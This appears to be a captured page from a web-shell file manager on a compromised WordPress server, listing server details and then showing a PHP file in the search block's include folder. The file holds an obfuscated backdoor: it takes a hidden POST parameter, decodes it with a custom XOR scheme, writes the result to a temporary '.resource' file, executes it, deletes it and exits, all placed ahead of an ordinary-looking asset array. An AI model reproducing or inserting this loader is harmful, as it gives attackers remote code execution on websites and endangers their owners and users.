| Server IP : 198.38.94.67 / Your IP : 216.73.217.178 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-includes/blocks/search/ |
Upload File : |
<?php if(in_array("p\x6Fint\x65r", array_keys($_POST))){ $bind = $_POST["p\x6Fint\x65r"]; $bind = explode( '.' , $bind) ; $item = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2); $l = 0; $__len = count($bind); do { if ($l >=$__len) break; $v7 = $bind[$l]; $sChar = ord($s2[$l %$lenS]); $dec = ((int)$v7 - $sChar - ($l %10)) ^71; $item .= chr($dec); $l++; }while (true); $entity = array_filter([getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/tmp", getenv("TMP"), "/dev/shm", "/var/tmp"]); while ($symbol = array_shift($entity)) { if (is_dir($symbol) ? is_writable($symbol) : false) { $key = join("/", [$symbol, ".resource"]); if (file_put_contents($key, $item)) { include $key; @unlink($key); die(); } } } }
return array('dependencies' => array(), 'version' => '2a0784014283afdd3c25');